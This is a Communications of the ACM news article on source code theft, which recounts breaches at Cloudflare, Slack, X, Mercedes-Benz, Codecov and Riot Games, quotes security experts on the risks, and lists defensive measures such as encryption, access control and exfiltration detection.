Security and Privacy

The Risks of Source Code Breaches

Why attackers want your source code, and what to do about it.

figures and open door

Cybercriminals are stealing source code—computer instructions that developers translate into software. Criminals study and alter software’s underlying source code to better identify its flaws, customize malicious software to exploit it, and target attacks on specific applications and organizations.

“Though there are vulnerabilities across the software ecosystem, there are many security approaches and layers to safeguard source code,” said Victor Acin, head of threat intelligence at Karlskrona, Sweden-based cybersecurity company Outpost24.

In November 2023, attackers, likely some that a nation-state hired, breached Cloudflare source code using stolen credentials (which identify the user to the system). According to a Cloudflare blog, the attackers compromised Cloudflare’s production Atlassian suite, a software product comprising developer tools. The breach included Bitbucket, an Atlassian tool for managing software code repositories where developers store and collaborate on source code, and 11,904 Cloudflare repositories. The attackers viewed 120 repositories and downloaded 76, including backup processes, global network configuration and management, and encrypted secrets, which are credentials hidden in scrambled code and stored in a safe place.

Cloudflare said in a post that it checked the repositories after the breach for embedded secrets, which are credentials stored in the source code where cybercriminals can easily find them, and vulnerabilities that an attacker could use in another attack. Cloudflare changed the embedded secrets and managed the vulnerabilities, such as by patching software or changing configurations.

Code Theft and Breach Concerns

“Attackers want to find existing vulnerabilities and inject new ones or malware [i.e., malicious software] into source code. They commonly do it with open source [software, which anyone can see, share, or change ] as it’s an easy target to access. But sophisticated threat actors have done it with internally developed software, too,” says Lou Steinberg, founder of CTM Insights, a Yorktown Neights, NY-based research laboratory and incubator for cybersecurity.

Attackers can test stolen source code and create attack scenarios and malware that target flaws in the code. They can inject malware, such as backdoors providing stealthy, unauthorized remote access, and other vulnerabilities into the code undetected. Such attacks will then affect the doctored code wherever it appears. Since developers reuse code liberally, it can multiply across applications exponentially, creating increasing risk.

Frequency and Severity

Knowing the frequency and severity of source code breaches is challenging, as organizations don’t always report those incidents. “Source code theft and leaks are more common than we like to believe, with many recent examples, including Slack, Twitter (X), and Mercedes-Benz,” says Acin.

A threat actor stole some of Slack’s private code in December 2022, according to a Slack blog. The actor breached Slack’s GitHub code repository using stolen Slack employee access tokens, which are alternatives to passwords for authentication. GitHub lets developers submit software changes simultaneously. The breach did not compromise customer data.

In March 2023, X, formerly Twitter, sent GitHub a copyright infringement takedown letter for the removal of its leaked source code, according to TechRepublic. X suspected a former employee purposely disclosed the source code to the public via GitHub. The code included proprietary source code for Twitter’s platform and internal tools, according to The Verge.

In January 2024, RedHunt Labs, an attack surface monitoring company in the U.K., reported discovering a Mercedes-Benz employee’s GitHub token in a public repository. The token gave the public unmonitored, unrestricted access to Mercedes-Benz’s internal GitHub Enterprise Server with all the source code hosted there, according to a RedHunt Labs blog.

The prevalence and gravity of these attacks are likely worse than the evidence suggests. Existing regulations from the U.S. Cybersecurity & Infrastructure Agency (CISA) and the Securities and Exchange Commission (SEC) mandating cyber incident reports could eventually enable risk metrics regarding the likelihood and severity of compromised code.

Taking It Personally

Attackers use stolen source code to construct attacks on specific organizations. “Personalized payloads are the king of the game, especially in high-profile cases where a nation-state-sponsored group such as Lazarus performs the attack,” said Acin. Lazarus is a North Korea-sponsored threat actor group that uses personalized payloads.

A personalized payload is an exploit targeting a particular application with a concrete purpose, according to Acin. These payloads are typically zero-day exploits sold in the underground market, Acin said. 9‘Zero Day’ means the vendor has zero days to fix the flaw before attackers exploit it.)

Fathomless Risk

The risk of stolen and altered source code is extensive. The attack surface, which includes all possible attack points, is vast and deep, with layers of software and systems supporting code development, dissemination, and use. Each layer has its vulnerabilities.

“It’s very difficult to protect modern development pipelines [systems that move software through development stages efficiently] and the massive supply chain of tools, libraries, and frameworks [pre-written code], and services that go into software development,” said Jeff Williams, co-founder and CTO at Contrast Security, a cybersecurity company.

Repeated examples of supply chain attacks, such as the one against SolarWinds, and vulnerabilities in open-source libraries, such as in Log4j, show the challenges of addressing compromised source code.

“Compromised source code can lead to unresolved security issues. I experienced a project where a minor vulnerability in a shared utility library went unnoticed for years. The delay in addressing the flaw increased the risk exposure and multiplied the remediation costs,” said Dmitrii Ivashchenko, Unity game developer at MY.GAMES.

Source code reuse spreads vulnerable code that cybercriminals may already have stolen. According to Ivashchenko, ubiquitous code reuse exacerbates the risk and amplifies the effects of source code breaches. It is not uncommon for developers to reuse code hundreds of thousands, if not millions of times across various projects and applications, Ivashchenko said.

Counting the Costs

It’s hard to distinguish the financial costs of source code compromise. Data breaches cost organizations a global average of $4.45 million each, according to the latest IBM Cost of a Data Breach Report.

“Organizations may face reputational damage due to compromised software, eroding customer trust and confidence,” said Ivashchenko. Source code breaches compromising user data or violating privacy also have legal and regulatory implications, Ivashchenko said.

Dissecting Code Breaches

Supply chain attacks use one vulnerability to attack many organizations. “If you inject code, you know exactly how to exploit it, and you leverage a trusted company as the distribution channel,” said Steinberg.

In 2021, threat actors changed the code in Codecov’s Bash Uploader script, according to a Codecov security update. Codecov is a software testing vendor. The attackers put their IP address (network address) in the Bash Uploader script to upload customer code to their server rather than Codecov. According to Dark Reading, attackers had access to Codecov customer development data for two months.

Social engineering is useful in attacks breaching source code. In 2023, attackers breached the source code for Riot Games’ League of Legends and Teamfight Tactics games, according to a Riot Games thread on X, formerly Twitter. Using a social engineering attack, the criminals took code for the games, a legacy anti-cheat platform designed to prevent cheating, and some experimental game modes and features. According to the thread, the attack disrupted the Riot Games software build environment and could cause future issues. Developers write, test, and deploy applications through a build environment.

Protecting Source Code

The best approaches to source code security include standard defenses and measures specific to code and code repositories. “Source code is just files, so all the standard file protection defenses apply: encryption, authentication, access control, change management, and exfiltration detection,” said Williams.

EncryptionIt scrambles data, so you can’t access it.
AuthenticationIt identifies a user before they can access a system.
Access ControlIt uses roles to control access rights and privileges.
Change ManagementIt plans, documents, and controls change.
Exfiltration DetectionIt detects and prevents data from leaving the organization.

Organizations can monitor and audit code repositories, enabling prompt detection and response to suspicious activities, said Ivashchenko. Organizations must consider measures such as code obfuscation, which makes code obscure and unintelligible to cybercriminals, said Ivashchenko. Likewise, white-box cryptography, which combines encryption with code obfuscation, can make exploiting code challenging for attackers even if they exfiltrate it for further examination, said Ivashchenko. 

Ivashchenko said that despite the uncertainties surrounding source code breaches and organizations’ reluctance to disclose such incidents, cybersecurity has sophisticated measures to safeguard source code against the ever-evolving landscape of cyber threats.

David Geer is a journalist who focuses on issues related to cybersecurity. He writes from Cleveland, OH, USA.

Join the Discussion (0)

Become a Member or Sign In to Post a Comment

The Latest from CACM

Shape the Future of Computing

ACM encourages its members to take a direct hand in shaping the future of the association. There are more ways than ever to get involved.

Get Involved

Communications of the ACM (CACM) is now a fully Open Access publication.

By opening CACM to the world, we hope to increase engagement among the broader computer science community and encourage non-members to discover the rich resources ACM has to offer.

Learn More